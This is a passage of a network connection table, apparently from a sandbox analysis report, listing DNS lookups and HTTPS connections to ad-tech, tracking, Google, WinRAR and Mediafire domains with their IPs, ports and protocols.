| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 8.8.8.8:53 | ads.playground.xyz | udp |
| US | 34.102.253.54:443 | ads.playground.xyz | tcp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| NL | 185.89.210.153:443 | secure.adnxs.com | tcp |
| US | 8.8.8.8:53 | 54.253.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.210.89.185.in-addr.arpa | udp |
| US | 8.28.7.84:443 | simage4.pubmatic.com | tcp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| NL | 142.250.179.142:443 | google.com | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| US | 104.36.113.112:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 112.113.36.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | match.deepintent.com | udp |
| US | 169.197.150.7:443 | match.deepintent.com | tcp |
| US | 8.8.8.8:53 | pm.w55c.net | udp |
| US | 52.207.49.244:443 | pm.w55c.net | tcp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| GB | 185.64.190.80:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | ums.acuityplatform.com | udp |
| US | 69.90.254.78:443 | ums.acuityplatform.com | tcp |
| US | 8.8.8.8:53 | 161.182.54.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.150.197.169.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.49.207.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacon.lynx.cognitivlabs.com | udp |
| US | 34.237.72.77:443 | beacon.lynx.cognitivlabs.com | tcp |
| US | 8.8.8.8:53 | mweb.ck.inmobi.com | udp |
| US | 20.85.134.6:443 | mweb.ck.inmobi.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 104.18.14.101:80 | crt.sectigo.com | tcp |
| US | 8.8.8.8:53 | 78.254.90.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.72.237.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.134.85.20.in-addr.arpa | udp |
| US | 162.248.18.37:443 | image2.pubmatic.com | tcp |
| US | 104.26.5.199:443 | onenews.com | tcp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| FR | 23.220.11.204:443 | px.owneriq.net | tcp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| NL | 95.101.74.204:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| NL | 199.232.150.132:443 | mv.outbrain.com | tcp |
| US | 8.8.8.8:53 | 204.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.150.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.onelaunch.com | udp |
| US | 172.67.68.170:443 | update.onelaunch.com | tcp |
| US | 8.8.8.8:53 | api.mixpanel.com | udp |
| US | 107.178.240.159:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | 170.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | mcdp-nldc1.outbrain.com | udp |
| US | 8.8.8.8:53 | log.outbrainimg.com | udp |
| US | 8.8.8.8:53 | log.outbrainimg.com | udp |
| NL | 20.13.96.71:443 | mcdp-nldc1.outbrain.com | tcp |
| US | 23.36.245.53:443 | widgets.outbrain.com | tcp |
| US | 23.36.245.53:443 | widgets.outbrain.com | tcp |
| US | 23.36.245.53:443 | widgets.outbrain.com | tcp |
| US | 64.202.112.223:443 | log.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | sync-jp.im-apps.net | udp |
| US | 8.8.8.8:53 | sync-jp.im-apps.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | beacon.krxd.net | udp |
| US | 8.8.8.8:53 | aa.agkn.com | udp |
| US | 8.8.8.8:53 | aa.agkn.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | id.geistm.com | udp |
| US | 8.8.8.8:53 | id.geistm.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | pixel-us-east.rubiconproject.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | tcp | |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id.geistm.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | cm.rtbsystem.com | udp |
| US | 8.8.8.8:53 | cm.rtbsystem.com | udp |
| US | 35.190.60.146:443 | id.rlcdn.com | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| IE | 52.211.144.29:443 | dpm.demdex.net | tcp |
| DE | 18.194.220.167:443 | aa.agkn.com | tcp |
| US | 35.168.78.115:443 | beacon.krxd.net | tcp |
| US | 74.119.119.150:443 | dis.criteo.com | tcp |
| DE | 85.114.159.118:443 | dsp.adfarm1.adition.com | tcp |
| NL | 2.19.195.233:443 | sync-jp.im-apps.net | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 3.232.64.79:443 | ps.eyeota.net | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 204.79.197.200:443 | c.bing.com | tcp |
| US | 162.248.18.32:443 | image8.pubmatic.com | tcp |
| CA | 185.80.39.216:443 | ssum-sec.casalemedia.com | tcp |
| US | 44.235.243.161:443 | loadus.exelator.com | tcp |
| US | 34.206.201.46:443 | sync.crwdcntrl.net | tcp |
| US | 8.43.72.97:443 | pixel-us-east.rubiconproject.com | tcp |
| US | 34.200.65.202:443 | ups.analytics.yahoo.com | tcp |
| US | 54.211.160.167:443 | ice.360yield.com | tcp |
| FR | 185.86.138.150:443 | ssbsync.smartadserver.com | tcp |
| US | 35.190.60.146:443 | id.rlcdn.com | tcp |
| US | 18.239.94.61:443 | s.ad.smaato.net | tcp |
| US | 207.198.113.86:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | id.geistm.com | udp |
| US | 8.8.8.8:53 | id.geistm.com | udp |
| US | 198.148.27.131:443 | bh.contextweb.com | tcp |
| US | 192.184.69.201:443 | cms.quantserve.com | tcp |
| DE | 141.95.33.111:443 | id5-sync.com | tcp |
| US | 188.114.96.0:443 | cm.rtbsystem.com | udp |
| US | 70.42.32.63:443 | b1sync.zemanta.com | tcp |
| US | 35.211.178.172:443 | x.bidswitch.net | tcp |
| US | 35.207.24.140:443 | rtb.mfadsrvr.com | tcp |
| US | 8.8.8.8:53 | 159.240.178.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.96.13.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.245.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.60.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.195.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.220.194.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.144.211.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.138.86.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | udp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 35.190.60.146:443 | id.rlcdn.com | udp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 50.31.142.255:443 | sync.outbrain.com | tcp |
| US | 35.207.24.140:443 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | pippio.com | udp |
| US | 8.8.8.8:53 | pippio.com | udp |
| US | 107.178.254.65:443 | pippio.com | tcp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 162.248.18.37:443 | image2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 32.18.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.78.168.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.64.232.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.201.206.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.72.43.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.65.200.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.160.211.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.113.198.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.243.235.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.24.207.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.254.178.107.in-addr.arpa | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | gocm.c.appier.net | udp |
| JP | 172.104.105.5:443 | gocm.c.appier.net | tcp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| JP | 172.104.105.5:443 | gocm.c.appier.net | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| US | 8.8.8.8:53 | 20.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.105.104.172.in-addr.arpa | udp |
| US | 162.248.18.37:443 | image2.pubmatic.com | tcp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | udp |
| US | 8.8.8.8:53 | thrtle.com | udp |
| US | 3.217.40.123:443 | thrtle.com | tcp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| US | 34.98.64.218:443 | us-u.openx.net | udp |
| US | 8.8.8.8:53 | sync.ipredictive.com | udp |
| US | 52.201.138.102:443 | sync.ipredictive.com | tcp |
| US | 8.8.8.8:53 | 123.40.217.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pmp.mxptint.net | udp |
| US | 38.98.69.175:443 | pmp.mxptint.net | tcp |
| GB | 185.64.190.80:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 102.138.201.52.in-addr.arpa | udp |
| US | 8.28.7.84:443 | simage4.pubmatic.com | tcp |
| US | 104.36.113.112:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | crb.kargo.com | udp |
| US | 54.163.78.196:443 | crb.kargo.com | tcp |
| US | 8.8.8.8:53 | sync.bfmio.com | udp |
| US | 52.44.243.216:443 | sync.bfmio.com | tcp |
| US | 8.8.8.8:53 | synchroscript.deliveryengine.adswizz.com | udp |
| IE | 63.35.66.167:443 | synchroscript.deliveryengine.adswizz.com | tcp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 35.190.60.146:443 | idsync.rlcdn.com | tcp |
| US | 8.8.8.8:53 | rtb.adentifi.com | udp |
| US | 3.227.180.0:443 | rtb.adentifi.com | tcp |
| US | 35.190.60.146:443 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | 196.78.163.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.243.44.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.66.35.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.180.227.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pippio.com | udp |
| US | 107.178.254.65:443 | pippio.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| DE | 141.95.33.111:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| FR | 178.250.7.11:443 | dis.eu.criteo.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | 11.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 35.83.134.252:443 | api-ext.slickdeals.net | tcp |
| US | 8.8.8.8:53 | 252.134.83.35.in-addr.arpa | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 64.202.112.223:443 | log.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | versionhistory.googleapis.com | udp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 107.178.240.159:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | udp |
| US | 104.36.113.112:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 34.228.209.226:443 | bcp.crwdcntrl.net | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| US | 8.8.8.8:53 | bpi.rtactivate.com | udp |
| US | 54.147.253.182:443 | bpi.rtactivate.com | tcp |
| US | 54.80.176.98:443 | i.liadm.com | tcp |
| US | 8.8.8.8:53 | 182.253.147.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.176.80.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| NL | 172.217.132.74:443 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-5hneknee.googlevideo.com | udp |
| NL | 74.125.8.70:443 | rr1---sn-5hneknee.googlevideo.com | udp |
| US | 8.8.8.8:53 | 74.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.8.125.74.in-addr.arpa | udp |
| US | 34.192.189.203:443 | i6.liadm.com | tcp |
| NL | 172.217.168.196:80 | www.google.com | tcp |
| NL | 172.217.168.196:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | rr5---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.202:443 | rr5---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | featureflags.lavasoft.com | udp |
| US | 104.17.9.52:443 | featureflags.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 203.189.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flwadw.com | udp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | rr5---sn-5hnekn76.googlevideo.com | udp |
| NL | 209.85.226.10:443 | rr5---sn-5hnekn76.googlevideo.com | udp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | rr1---sn-5hne6nsr.googlevideo.com | udp |
| NL | 172.217.132.70:443 | rr1---sn-5hne6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | 70.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hneknes.googlevideo.com | udp |
| NL | 74.125.8.200:443 | rr3---sn-5hneknes.googlevideo.com | udp |
| US | 8.8.8.8:53 | livepix.gg | udp |
| US | 76.76.21.21:443 | livepix.gg | tcp |
| US | 8.8.8.8:53 | 21.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.livepix.gg | udp |
| US | 76.76.21.21:443 | livepix.gg | tcp |
| NL | 13.227.219.24:443 | static.livepix.gg | tcp |
| US | 8.8.8.8:53 | 24.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | webservice.livepix.gg | udp |
| US | 104.22.78.129:443 | webservice.livepix.gg | tcp |
| US | 8.8.8.8:53 | unleash.livepix.gg | udp |
| US | 104.22.78.129:443 | unleash.livepix.gg | tcp |
| US | 8.8.8.8:53 | platform.illow.io | udp |
| NL | 13.227.219.24:443 | static.livepix.gg | udp |
| NL | 52.222.139.16:443 | platform.illow.io | tcp |
| NL | 13.227.219.24:443 | static.livepix.gg | udp |
| US | 104.22.78.129:443 | unleash.livepix.gg | udp |
| US | 172.67.42.236:443 | unleash.livepix.gg | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | auth.livepix.gg | udp |
| US | 8.8.8.8:53 | api.platform.illow.io | udp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| US | 8.8.8.8:53 | 129.78.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.42.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.161.195.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nsk.googlevideo.com | udp |
| NL | 172.217.132.39:443 | rr2---sn-5hne6nsk.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnekn7s.googlevideo.com | udp |
| NL | 74.125.100.40:443 | rr3---sn-5hnekn7s.googlevideo.com | udp |
| US | 8.8.8.8:53 | 40.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hneknek.googlevideo.com | udp |
| NL | 74.125.8.138:443 | rr5---sn-5hneknek.googlevideo.com | udp |
| US | 8.8.8.8:53 | 138.8.125.74.in-addr.arpa | udp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | udp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| NL | 74.125.8.103:443 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| US | 8.8.8.8:53 | 103.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| NL | 142.251.36.34:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 142.251.36.42:443 | content-autofill.googleapis.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 74.125.8.103:443 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.54.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | optimizationguide-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.149.207.94:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 94.207.149.54.in-addr.arpa | udp |
| NL | 157.240.247.35:443 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 216.239.38.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 181.38.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| DE | 172.217.23.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | translate-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | translate-pa.googleapis.com | tcp |
| US | 104.16.54.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| US | 104.26.6.139:443 | btloader.com | tcp |
| US | 54.149.207.94:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 34.107.148.139:443 | prebid.media.net | tcp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 8.8.8.8:53 | 209.83.237.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 74.119.119.131:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | 9f0e855800c7be1875206c783afb8546.safeframe.googlesyndication.com | udp |
| NL | 52.222.139.7:443 | tags.crwdcntrl.net | tcp |
| NL | 142.250.179.161:443 | 9f0e855800c7be1875206c783afb8546.safeframe.googlesyndication.com | tcp |
| US | 18.239.100.78:443 | cdn.prod.uidapi.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 3.233.93.158:443 | bcp.crwdcntrl.net | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
